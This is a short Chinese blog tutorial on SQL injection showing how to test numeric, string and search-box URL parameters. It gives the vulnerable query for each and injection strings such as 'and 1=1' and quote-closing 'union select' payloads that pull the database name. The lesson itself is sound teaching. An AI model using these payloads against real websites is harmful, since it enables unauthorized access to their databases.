1、数字型参数
URL:blog.yangliu.date/index.php?id=1
SQL:select * from admin where page=$id
和之前的判断方法一样,直接后边添加and 1=1来判断
2、字符型参数
URL:blog.yangliu.date/index.php?name=帅
SQL:select from admin where username=’$name’
需要对单引号进行闭合:blog.yangliu.date/index.php?name=帅‘ union select 1,2,3 —
巧用mysql注释:– # /**/
3、搜索型参数
URL:blog.yangliu.date/index.php?search=帅 ————>搜索框
SQL:select * from admin where username like ‘%$search%’ order by username
需要对单引号和百分号进行闭合:blog.yangliu.date/index.php?search=帅%’ union select database(),2,3 and ‘%’=’
欢迎关注微信公众号(coder0x00)或扫描下方二维码关注,我们将持续搜寻程序员必备基础技能包提供给大家。
网友评论